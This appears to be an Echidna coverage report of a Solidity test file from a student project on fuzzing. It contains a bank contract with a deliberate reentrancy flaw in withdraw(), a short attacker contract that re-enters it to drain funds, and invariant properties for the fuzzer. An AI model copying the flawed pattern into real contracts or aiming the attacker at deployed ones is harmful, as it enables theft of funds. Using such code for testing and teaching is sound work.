/home/ali/TFG/pruebas-echidna/echidna/ReentrancyEchidnaTest.sol
  1 |     | // SPDX-License-Identifier: UNLICENSED
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 | *   | contract VulnerableBank {
  5 |     |     mapping(address => uint256) public balances;
  6 |     | 
  7 |     |     function deposit() public payable {
  8 |     |         balances[msg.sender] += msg.value;
  9 |     |     }
 10 |     | 
 11 |     |     function withdraw() public {
 12 |     |         uint256 balance = balances[msg.sender];
 13 |     |         require(balance > 0, "Insufficient balance");
 14 |     |         
 15 |     |         // ❌ VULNERABLE: Transfer ANTES de update state
 16 |     |         (bool success, ) = msg.sender.call{value: balance}("");
 17 |     |         require(success, "Transfer failed");
 18 |     |         
 19 |     |         balances[msg.sender] = 0;
 20 |     |     }
 21 |     | }
 22 |     | 
 23 |     | contract ReentrancyAttacker {
 24 |     |     VulnerableBank public bank;
 25 |     |     uint256 public attackCount;
 26 |     | 
 27 |     |     constructor(address _bank) {
 28 |     |         bank = VulnerableBank(_bank);
 29 |     |     }
 30 |     | 
 31 |     |     function attack() external payable {
 32 |     |         bank.deposit{value: msg.value}();
 33 |     |         bank.withdraw();
 34 |     |     }
 35 |     | 
 36 |     |     receive() external payable {
 37 |     |         if (address(bank).balance >= msg.value && attackCount++ < 5) {
 38 |     |             bank.withdraw();
 39 |     |         }
 40 |     |     }
 41 |     | }
 42 |     | 
 43 | *r  | contract ReentrancyEchidnaTest {
 44 | *r  |     VulnerableBank public bank;
 45 |     |     
 46 | *   |     constructor() {
 47 | *   |         bank = new VulnerableBank();
 48 |     |     }
 49 |     |     
 50 |     |     // ✅ Setup que Echidna LLAMA naturalmente
 51 |     |     function echidna_init_deposit() public payable {
 52 |     |         bank.deposit{value: msg.value}();
 53 |     |     }
 54 |     |     
 55 |     |     // ✅ Propiedades que solo chequean INVARIANTE
 56 |     |     function echidna_bank_has_funds() public returns (bool) {
 57 |     |         return address(bank).balance > 0;
 58 |     |     }
 59 |     |     
 60 |     |     function echidna_bank_balance_stable() public returns (bool) {
 61 |     |         ReentrancyAttacker attacker = new ReentrancyAttacker(address(bank));
 62 |     |         attacker.attack{value: 1}();
 63 |     |         return address(bank).balance > 0;
 64 |     |     }
 65 |     | }

